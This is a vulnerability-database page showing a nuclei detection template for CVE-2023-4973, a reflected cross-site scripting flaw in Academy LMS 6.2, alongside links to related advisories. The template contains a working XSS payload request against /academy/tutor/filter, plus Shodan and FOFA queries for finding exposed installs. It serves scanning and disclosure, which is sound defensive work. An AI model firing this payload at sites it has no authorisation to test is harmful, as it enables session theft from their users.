Lucene search
K

Academy LMS 6.2 - Cross-Site Scripting

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Vulnerability in Academy LMS 6.2 - Cross-Site Scripting on Windows. Manipulating GET parameters /academy/tutor/filter leads to remote XSS attack

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Academy LMS 6.2 Cross Site Scripting Vulnerability
18 Sep 202300:00
zdt
Circl
CVE-2023-4973
24 Apr 202421:09
circl
CNNVD
Creative Item Academy LMS Cross-Site Scripting Vulnerability
14 Sep 202300:00
cnnvd
CVE
CVE-2023-4973
15 Sep 202302:00
cve
Cvelist
CVE-2023-4973 Academy LMS GET Parameter filter cross site scripting
15 Sep 202302:00
cvelist
Exploit DB
Academy LMS 6.2 - Reflected XSS
31 Jan 202400:00
exploitdb
EUVD
EUVD-2023-54809
3 Oct 202520:07
euvd
NVD
CVE-2023-4973
15 Sep 202302:15
nvd
OSV
CVE-2023-4973
15 Sep 202302:15
osv
Packet Storm
Academy LMS 6.2 Cross Site Scripting
15 Sep 202300:00
packetstorm
Rows per page
id: CVE-2023-4973

info:
  name: Academy LMS 6.2 - Cross-Site Scripting
  author: ritikchaddha,princechaddha
  severity: medium
  description: |
    A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript via reflected XSS in search parameters, potentially stealing user session cookies or performing actions on behalf of users.
  remediation: |
    Update Academy LMS to version 6.3 or later.
  reference:
    - https://packetstormsecurity.com/files/174680/Academy-LMS-6.2-Cross-Site-Scripting.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4973
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4973
    cwe-id: CWE-79
    epss-score: 0.01835
    epss-percentile: 0.76239
    cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: creativeitem
    product: academy_lms
    shodan-query:
      - html:"Academy LMS"
      - http.html:"academy lms"
    fofa-query:
      - body="Academy LMS"
      - body="academy lms"
  tags: packetstorm,cve2023,cve,academylms,xss,creativeitem,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_tution_class_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_duration%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "List of tuitions")'
        condition: and
# digest: 4b0a004830460221009b1bd38111cd5aad051d2bee0a490ff622aeee971861d5367b1314b96e9ab782022100e523e5d6f2641c4650cf61ae4b9f60c7d3c8914d648fc1517ed4a0e2889b7f7e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
3.8Low risk
Vulners AI Score3.8
CVSS 3.13.5 - 6.1
CVSS 24
CVSS 33.5
EPSS0.01835
SSVC
33